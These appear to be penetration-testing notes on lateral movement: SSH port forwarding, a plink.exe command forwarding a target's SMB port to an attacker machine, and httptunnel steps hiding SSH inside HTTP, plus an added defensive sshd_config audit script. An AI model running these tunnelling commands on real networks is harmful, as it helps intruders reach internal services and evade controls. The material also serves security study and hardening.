Lateral movement

Pivoting / lateral movement / port forwarding / tunneling

Local port forwarding

Forward local port to remote host

ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

Remote port forwarding

Forward remote port to local host

ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Windows: forward the target's local port 445 to port 444 on our attacking machine. First start the SSH service on our attacking machine:

service ssh start

Download plink.exe to the target and execute it (where x.x.x.x is our attacking machine):

plink.exe -l root x.x.x.x -R 444:127.0.0.1:445

Dynamic port forwarding

The -D flag makes SSH act as a SOCKS (4, 5) proxy server: applications configured to use the proxy send their traffic through the SSH tunnel, and the remote server connects onward to whatever destination each application requests. Unlike local port forwarding, which maps one fixed port to one destination, a single dynamic proxy port can carry connections to many destination hosts and ports.

ssh -D <local proxy port> -p <remote port> <target>
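From the defender's side, the -L, -R and -D options above only work through a host whose sshd permits them. As an added example that is not part of the original notes, the following script audits the relevant sshd_config keywords; it assumes standard sshd parsing rules (first value of a keyword wins, keywords are case-insensitive, Match blocks apply only to matching connections) and the upstream OpenSSH defaults for absent keywords.

```python
import re

# Added example: audit the sshd_config keywords that decide whether an
# authenticated user can run the -L / -R / -D forwarding shown above.
# sshd semantics assumed here: the FIRST value for a keyword wins, later
# duplicates are ignored, and keywords are case-insensitive.
# Lines after a "Match" block apply only to matching connections, so the
# global section is what an arbitrary user gets.
RECOMMENDED = {
    "allowtcpforwarding": "no",  # disables -L / -R / -D through this host
    "gatewayports": "no",        # -R listeners stay bound to loopback
    "permittunnel": "no",        # no tun(4) layer-2/3 tunnels (-w)
    "x11forwarding": "no",
}
# What sshd assumes when the keyword is absent from the file (OpenSSH defaults).
SSHD_DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "x11forwarding": "no",
}

def parse_global_section(config_text):
    """Return {keyword: first value} for the part before any Match block."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # sshd accepts both "Keyword value" and "Keyword=value"
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2 and key not in seen:
            seen[key] = parts[1].strip().lower()
    return seen

def audit_sshd_config(config_text):
    """Return [(keyword, effective value, recommended value, source)] for
    every keyword whose effective global value is weaker than recommended."""
    explicit = parse_global_section(config_text)
    findings = []
    for key, want in RECOMMENDED.items():
        source = "file" if key in explicit else "default"
        got = explicit.get(key, SSHD_DEFAULTS[key])
        if got != want:
            findings.append((key, got, want, source))
    return findings

if __name__ == "__main__":
    # constructed sample config: the Match block does not protect other users
    sample = "Port 22\nAllowTcpForwarding yes\nGatewayPorts=clientspecified\nMatch User backup\n  AllowTcpForwarding no\n"
    for f in audit_sshd_config(sample):
        print("%s is %s; recommended %s (value from %s)" % f)
```

Run it against /etc/sshd_config on a bastion or jump host; an empty result means forwarding and tunnelling are disabled for every user in the global section.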

Traffic encapsulation

SSH over HTTP

Using httptunnel

httptunnel only works with TCP services.

At target: open port 80 and redirect incoming traffic from port 80 to port 22 (the SSH service):

hts -F localhost:22 x.x.x.x:80

Where x.x.x.x is the LAN or public IP of the attacker.

At client: start a tunnel on an arbitrary local port (6969 here) that is bound to port 80 on the other end:

htc.exe -F 6969 x.x.x.x:80

At client: log in via SSH:

ssh -p 6969 localhost
